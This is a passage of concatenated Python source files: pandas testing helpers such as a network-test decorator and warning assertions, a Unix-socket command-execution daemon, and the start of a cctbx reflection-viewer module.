assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
Any exception that has .errno or .reason.erno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
Traceback
...
URLError: <urlopen error unknown url type: rabit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
if not errno and hasattr(errno, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
the warning to show were the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
..warn:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
Context manager to set the numpy random number generator speed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
def external_error_raised(expected_exception: Type[Exception],) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
|
server.py | """
Command execution server process.
| Server process | | forkserver |
client server
run -------
client -> server
To allow use of any callable in the server we override the forkserver
implementation and do not
"""
from __future__ import annotations
import contextvars
import functools
import json
import logging
import multiprocessing
import os
import signal
import socket
import sys
import time
import traceback
from abc import ABC, abstractmethod
from contextlib import ExitStack
from ._asyncio import DeadlineTimer
from ._imports import asyncio
from ._logging import ContextLogger
from ._multiprocessing import run_in_process
from ._multiprocessing_asyncio import (
AsyncConnectionAdapter,
AsyncListener,
AsyncProcess,
ConnectionClose,
ListenerStopped,
)
from ._typing import MYPY_CHECK_RUNNING
from ._signal import settable_signals
from .constants import socket_name, stop_socket_name, server_state_name
from .protocol import ProcessState, Request, RequestTypes, Response
from .xdg import RuntimeDir
from .. import __version__
if MYPY_CHECK_RUNNING:
from typing import Any, Dict, Optional
from ._types import NoneFunction
logger = ContextLogger(logging.getLogger(__name__), prefix="server_")
def run(
socket_handler,
runtime_dir: RuntimeDir,
server_idle_timeout: Optional[float],
user_data: Optional[Any],
):
"""Start the server in the background.
The function returns only when the server has successfully started.
Args:
socket_handler: function invoked on each request
runtime_dir: directory for holding socket/pid file and used as the
working directory for the server
server_idle_timeout: timeout after which server will shutdown if no
active requests
user_data: JSON-serializable object put into server metadata file
Raises:
If there are any issues starting the server errors are re-raised.
"""
logger.debug("Starting server launcher")
daemon_options = {
# This ensures that relative files are created in the context of the
# actual runtime dir and not at the path that happens to exist at the
# time.
"working_directory": runtime_dir.fileno()
}
target = functools.partial(
_run_server, socket_handler, server_idle_timeout, user_data
)
return run_in_process(daemonize, args=(target, daemon_options), allow_detach=True)
def daemonize(detach, target, daemon_options: Dict):
os.chdir(daemon_options["working_directory"])
# Make the process a process leader - signals sent to the parent group
# will no longer propagate by default.
os.setsid()
# Secure umask by default.
os.umask(0o077)
# Reset signal handlers.
# We omit SIGPIPE so the default Python signal handler correctly translates
# it into an exception on socket write.
for signum in settable_signals - {signal.SIGPIPE}:
signal.signal(signum, signal.SIG_DFL)
# Reset signal disposition.
signal.pthread_sigmask(signal.SIG_SETMASK, set())
# Redirect streams.
devnull = os.open(os.devnull, os.O_RDWR)
os.dup2(devnull, sys.stdin.fileno())
os.dup2(devnull, sys.stdout.fileno())
os.dup2(devnull, sys.stderr.fileno())
target(detach)
def _run_server(
callback, server_idle_timeout: Optional[float], user_data, done
) -> None:
"""Server that provides sockets to `callback`.
Method must be invoked when cwd is suitable for secure creation of files.
Args:
callback: the callback function invoked on each request
server_idle_timeout: timeout after which the server will stop
automatically
done: callback function invoked after setup and before we start handling
requests
"""
logger.debug("_run_server()")
loop = asyncio.new_event_loop()
def print_exception(_loop, context):
exc = context.get("exception")
if exc:
formatted_exc = "".join(
traceback.format_exception(type(exc), exc, exc.__traceback__)
)
else:
formatted_exc = "<no exception>"
logger.error("Error in event loop: %r\n%s", context, formatted_exc)
loop.set_exception_handler(print_exception)
handler = ProcessConnectionHandler(callback, {}, loop=loop)
def finish_loop():
logger.debug("Stopping loop")
loop.stop()
tasks = asyncio.all_tasks(loop)
logger.debug("Number of pending tasks: %d", len(tasks))
loop.run_until_complete(asyncio.gather(*tasks))
logger.debug("Finished pending tasks")
# socket_name is relative and we must already have cwd set to the
# runtime_dir.
server = Server(
socket_name,
stop_socket_name,
handler,
finish_loop,
server_idle_timeout,
loop=loop,
)
def handle_sigterm():
logger.debug("Received SIGTERM")
loop.create_task(server.stop())
loop.add_signal_handler(signal.SIGTERM, handle_sigterm)
done()
# For logging.
multiprocessing.current_process().name = "server"
# For server state info.
pid = os.getpid()
server_state = {
"create_time": time.time(),
"lib_version": __version__,
"idle_timeout": server_idle_timeout,
"pid": pid,
"user_data": user_data,
"groups": os.getgroups(),
"gid": os.getgid(),
}
with open(server_state_name, "w", encoding="utf-8") as f:
json.dump(server_state, f)
logger.debug("Starting server")
server.serve()
loop.run_forever()
logger.debug("Server finished.")
class ConnectionHandler(ABC):
@abstractmethod
async def handle_connection(self, connection: AsyncConnectionAdapter):
pass
@abstractmethod
async def handle_shutdown(self):
pass
connection_id_var = contextvars.ContextVar("server_connection_id")
class ProcessConnectionHandler(ConnectionHandler):
def __init__(self, callback, context: Dict[str, str], loop=None):
"""
Args:
callback: function to be executed in child process
context: server execution context, pretty much a user info object
"""
if not loop:
loop = asyncio.get_event_loop()
self._loop = loop
self._callback = callback
self._context = context
self._start_time = time.time()
self._pid = os.getpid()
self._connection_finish_cv = asyncio.Condition(loop=self._loop)
self._num_active_connections = 0
async def handle_connection(self, connection: AsyncConnectionAdapter):
self._num_active_connections += 1
connection_id_var.set(connection.connection.fileno())
logger.debug("Handling connection")
try:
await self._handle_connection(connection)
except Exception:
logger.exception("Unexpected exception handling connection")
raise
finally:
logger.debug("Done with connection")
self._num_active_connections -= 1
async with self._connection_finish_cv:
self._connection_finish_cv.notify_all()
async def _handle_connection(self, connection: AsyncConnectionAdapter):
# noinspection PyTypeChecker
process: AsyncProcess = None
# noinspection PyTypeChecker
process_task: asyncio.Task = None
queue = asyncio.Queue()
# Have 2 asynchronous tasks running in a loop:
# - accept_request
# - handle_request
# accept_request waits on connection receive or error.
# on receipt, accept_request pushes to queue
# on error, accept_request
# handle_request always waits on the queue for requests and then handles
# them as it is able
async def handle_request():
"""Wait for and handle a single request."""
nonlocal process, process_task
logger.debug("Waiting for request")
request = await queue.get()
if request.name == RequestTypes.run_process:
assert process is None, "Process must not have been started"
process_state = request.contents
process = self._start_callback(process_state)
process_task = asyncio.create_task(process.wait())
pid = process.pid
logger.debug("Running process in handler: %d", pid)
await connection.send(Response(pid))
elif request.name == RequestTypes.wait_process_done:
assert process is not None, "Process must have been started"
logger.debug("Waiting for process to exit")
# We don't want the process.wait() task to be cancelled in case
# our connection gets broken.
exitcode = await asyncio.shield(process_task)
logger.debug("Result: %d", exitcode)
await connection.send(Response(exitcode))
return True
async def accept_request():
try:
request: Request = await connection.recv()
except ConnectionClose:
logger.debug("Connection closed")
except ConnectionResetError:
logger.debug("Connection reset")
else:
# We dispatch asynchronously so we can always notice connection
# reset quickly.
queue.put_nowait(request)
return True
# This occurs when we have disconnected from the client so cancel
# any pending responses and kill the child process.
if process:
logger.debug("Killing child process")
try:
process.kill()
except ProcessLookupError:
# No problem, process already exited.
pass
logger.debug("Cancelling request handler")
request_handler.cancel()
async def loop(coro):
while True:
if not await coro():
break
request_acceptor = asyncio.create_task(loop(accept_request))
request_handler = asyncio.create_task(loop(handle_request))
all_tasks = asyncio.gather(request_acceptor, request_handler)
try:
await all_tasks
except asyncio.CancelledError:
pass
finally:
logger.debug("Task cancelled or exception")
all_tasks.cancel()
if process_task:
logger.debug("Waiting for child process to exit")
logger.debug("Process task: %s", process_task)
await process_task
def _start_callback(self, process_state) -> AsyncProcess:
def setup_child():
# XXX: Should close open fds (except the one for the sentinel).
ProcessState.apply_to_current_process(process_state)
try:
sys.exit(self._callback())
except SystemExit as e:
# multiprocessing sets exitcode to 1 if `sys.exit` is called
# with `None` or no arguments, so we re-map it here.
# See https://bugs.python.org/issue35727.
if e.code is None:
e.args = (0,)
e.code = 0
raise
process = AsyncProcess(target=setup_child, loop=self._loop)
process.start()
return process
async def handle_shutdown(self):
"""Shutdown executor"""
logger.debug("Waiting for all connection handling to be done")
# Wait for handling of all connections to be done.
async with self._connection_finish_cv:
await self._connection_finish_cv.wait_for(
lambda: not self._num_active_connections
)
class Server:
"""A multiprocessing.Connection server accepts new connections and dispatches handling of requests to
the AsyncProcessExecutor.
Per https://bugs.python.org/issue21998 asyncio is not fork-safe, so we spawn
an executor prior to the starting of the event loop which has essentially
the state that existed after the call to the cli factory.
Not thread-safe.
"""
def __init__(
self,
socket_path,
stop_socket_path,
handler: ConnectionHandler,
on_shutdown: NoneFunction,
idle_timeout: Optional[int] = None,
shutdown_ctx=None,
loop=None,
):
"""
Args:
socket_path: path to listen for client connections
stop_socket_path: path to a socket which, when a client connects,
will cause the server to shut down
handler: Handler for received connections
idle_timeout: timeout (in seconds) after which server will shut itself down
without any work
shutdown_ctx: Context manager to be entered prior to server shutdown.
loop
"""
if not loop:
loop = asyncio.get_event_loop()
self._loop = loop
self._stop_socket_path = stop_socket_path
self._listener = AsyncListener(socket_path, loop=self._loop)
self._handler = handler
self._idle_timeout = idle_timeout
self._idle_timer = None
self._shutdown_ctx = shutdown_ctx
self._num_active_connections = 0
self._shutting_down = False
self._shutdown_accept_cv = asyncio.Condition(loop=self._loop)
self._on_shutdown = on_shutdown
def serve(self):
self._loop.create_task(self._serve_stop())
self._loop.create_task(self._serve_clients())
async def stop(self):
"""Gracefully stop server, processing all pending connections.
"""
# Do server shutdown and pending event handling first.
# Server shutdown should ensure:
# 1. No accepted connections are unhandled
# 2. All pending asynchronous functions have returned
# 3. All cleanup by the handler is done.
logger.debug("Server.stop()")
self._shutting_down = True
with ExitStack() as stack:
if self._shutdown_ctx:
stack.enter_context(self._shutdown_ctx)
# Prevent timeout from occurring while we're shutting down.
self._clear_idle_timer()
# Closing the listener ensures there will be no more connections
# queued.
logger.debug("Waiting for listener close")
await self._listener.close()
logger.debug("Waiting for pending connections")
async with self._shutdown_accept_cv:
await self._shutdown_accept_cv.wait()
logger.debug("Waiting for handler shutdown")
await self._handler.handle_shutdown()
logger.debug("Waiting for shutdown callback")
# Finish everything off.
self._on_shutdown()
async def _serve_stop(self):
sock = self._stop_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(self._stop_socket_path)
sock.listen(1)
sock.setblocking(False)
self._loop.add_reader(sock.fileno(), self._on_stop_connect)
def _on_stop_connect(self):
self._loop.remove_reader(self._stop_sock.fileno())
_sock, _address = self._stop_sock.accept()
# XXX: Should we close the socket?
self._loop.create_task(self.stop())
async def _serve_clients(self):
while True:
try:
connection = await self._listener.accept()
except ListenerStopped:
if not self._shutting_down:
logger.error("Listener has stopped")
else:
async with self._shutdown_accept_cv:
self._shutdown_accept_cv.notify()
return
else:
self._handle_connection(connection)
def _handle_connection(self, connection: AsyncConnectionAdapter):
self._idle_handle_connect()
async def wait_closed():
await connection.closed()
self._idle_handle_close()
self._loop.create_task(wait_closed())
self._loop.create_task(self._handler.handle_connection(connection))
def _handle_timeout(self):
self._loop.create_task(self.stop())
def _set_idle_timer(self):
if self._shutting_down:
return
if self._idle_timeout is None:
return
if self._idle_timer is not None:
return
self._idle_timer = DeadlineTimer(self._handle_timeout, self._loop)
self._idle_timer.expires_from_now(self._idle_timeout)
def _clear_idle_timer(self):
if self._idle_timeout is None:
return
if self._idle_timer is None:
return
self._idle_timer.cancel()
self._idle_timer = None
def _idle_handle_connect(self):
self._num_active_connections += 1
self._clear_idle_timer()
def _idle_handle_close(self):
self._num_active_connections -= 1
if not self._num_active_connections:
self._set_idle_timer()
|
jsview_3d.py |
from __future__ import absolute_import, division, print_function
from libtbx.math_utils import roundoff
import traceback
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from cctbx import miller
from crys3d.hklview import HKLJavaScripts
from scitbx import graphics_utils
from scitbx import matrix
import scitbx.math
from libtbx.utils import Sorry, to_str
import threading, math, sys, cmath
if sys.version_info[0] > 2: # using websockets which is superior to websocket_server
from crys3d.hklview.WebBrowserMessengerPy3 import WBmessenger
else: # using websocket_server
from crys3d.hklview.WebBrowserMessengerPy2 import WBmessenger
from time import sleep
import os.path, time, copy
import libtbx
import webbrowser, tempfile
from six.moves import range
def has_phil_path(philobj, *paths): # variable number of arguments
for path in paths:
if len([ e.path for e in philobj.all_definitions() if path in e.path.split(".") ]):
return True
return False
class ArrayInfo:
def __init__(self, millarr, mprint=sys.stdout.write, fomlabel=None):
from iotbx.gui_tools.reflections import get_array_description
if (millarr.unit_cell() is None) or (millarr.space_group() is None) :
raise Sorry("No space group info is present in data")
data = millarr.data()
self.datatype = ""
if (isinstance(data, flex.int)):
data = flex.double([e for e in data if e!= display.inanval])
self.datatype = "isint"
if millarr.is_complex_array():
data = flex.abs(millarr.data())
self.datatype = "iscomplex"
#data = [e for e in data if not math.isnan(e)]
data = graphics_utils.NoNansArray( data, data[0] ) # assuming data[0] isn't NaN
self.maxdata = flex.max( data )
self.mindata = flex.min( data )
self.maxsigmas = self.minsigmas = None
if millarr.sigmas() is not None:
data = millarr.sigmas()
self.datatype = "hassigmas"
#data = [e for e in data if not math.isnan(e)]
data = graphics_utils.NoNansArray( data, data[0] ) # assuming data[0] isn't NaN
self.maxsigmas = flex.max( data )
self.minsigmas = flex.min( data )
self.minmaxdata = (roundoff(self.mindata), roundoff(self.maxdata))
self.minmaxsigs = (roundoff(self.minsigmas), roundoff(self.maxsigmas))
self.labels = self.desc = ""
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if millarr.info():
#self.labels = millarr.info().label_string()
self.labels = millarr.info().labels
if fomlabel:
self.labels = [ millarr.info().label_string() + " + " + fomlabel ]
self.datatype = "iscomplex_fom"
self.desc = get_array_description(millarr)
self.span = ("?" , "?")
self.spginf = millarr.space_group_info().symbol_and_number()
dmin = 0.0
dmax = 0.0
try:
self.span = ( millarr.index_span().min(), millarr.index_span().max())
dmin = millarr.d_max_min()[1]
dmax = millarr.d_max_min()[0]
except Exception as e:
mprint(to_str(e))
issymunique = millarr.is_unique_set_under_symmetry()
isanomalous = millarr.anomalous_flag()
self.infotpl = ( ",".join(self.labels), self.desc, self.spginf, millarr.indices().size(), self.span,
self.minmaxdata, self.minmaxsigs, (roundoff(dmin), roundoff(dmax)), issymunique, isanomalous )
self.infostr = "%s (%s), space group: %s, %s HKLs: %s, MinMax: %s, MinMaxSigs: %s, d_minmax: %s, SymUnique: %d, Anomalous: %d" %self.infotpl
def MakeHKLscene( proc_array, pidx, setts, mapcoef_fom_dict, merge, mprint=sys.stdout.write):
scenemaxdata =[]
scenemindata =[]
scenemaxsigmas = []
sceneminsigmas = []
scenearrayinfos = []
hklscenes = []
fomsarrays_idx = [(None, None)]
#mprint("in MakeHKLscene", verbose=True)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if proc_array.is_complex_array():
fomsarrays_idx.extend( mapcoef_fom_dict.get(proc_array.info().label_string()) )
settings = setts
if (settings.expand_anomalous or settings.expand_to_p1) \
and not proc_array.is_unique_set_under_symmetry() and not merge:
#settings = copy.deepcopy(settings)
settings.expand_anomalous = False
settings.expand_to_p1 = False
mprint("The " + proc_array.info().label_string() + \
" array is not symmetry unique and therefore won't be expanded")
if (settings.inbrowser==True):
settings.expand_anomalous = False
settings.expand_to_p1 = False
for (fomsarray, fidx) in fomsarrays_idx:
hklscene = display.scene(miller_array=proc_array, merge=merge,
settings=settings, foms_array=fomsarray, fullprocessarray=True )
if not hklscene.SceneCreated:
mprint("The " + proc_array.info().label_string() + " array was not processed")
#return False
continue
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
# cast any NAN values to 1 of the colours and radii to 0.2 before writing javascript
if hklscene.SceneCreated:
hklscenes.append( hklscene)
#b = flex.bool([math.isnan(e[0] + e[1] + e[2]) for e in hklscene.colors])
#hklscene.colors = hklscene.colors.set_selected(b, (1.0, 1.0, 1.0))
hklscene.colors = graphics_utils.NoNansvec3( hklscene.colors, 1.0, 1.0, 1.0)
#b = flex.bool([math.isnan(e) for e in hklscene.radii])
#hklscene.radii = hklscene.radii.set_selected(b, 0.2)
hklscene.radii = graphics_utils.NoNansArray( hklscene.radii, 0.2)
fomslabel = None
if fomsarray:
fomslabel = fomsarray.info().label_string()
ainf = ArrayInfo(hklscene.work_array, fomlabel=fomslabel)
scenemaxdata.append( ainf.maxdata )
scenemindata.append( ainf.mindata )
scenemaxsigmas.append(ainf.maxsigmas)
sceneminsigmas.append(ainf.minsigmas)
scenearrayinfos.append([ainf.infostr, pidx, fidx, ainf.labels, ainf.datatype])
#self.mprint("%d, %s" %(i, infostr) )
#i +=1
return (hklscenes, scenemaxdata, scenemindata, scenemaxsigmas, sceneminsigmas, scenearrayinfos)
def MakeTtips(hklscene, j):
tooltipstringsdict = {}
colstraliases = ""
if hklscene.isUsingFOMs():
return tooltipstringsdict, colstraliases # already have tooltips for the scene without the associated fom
colstraliases += "\n var st%d = '\\n%s: '" %(j, hklscene.work_array.info().label_string() )
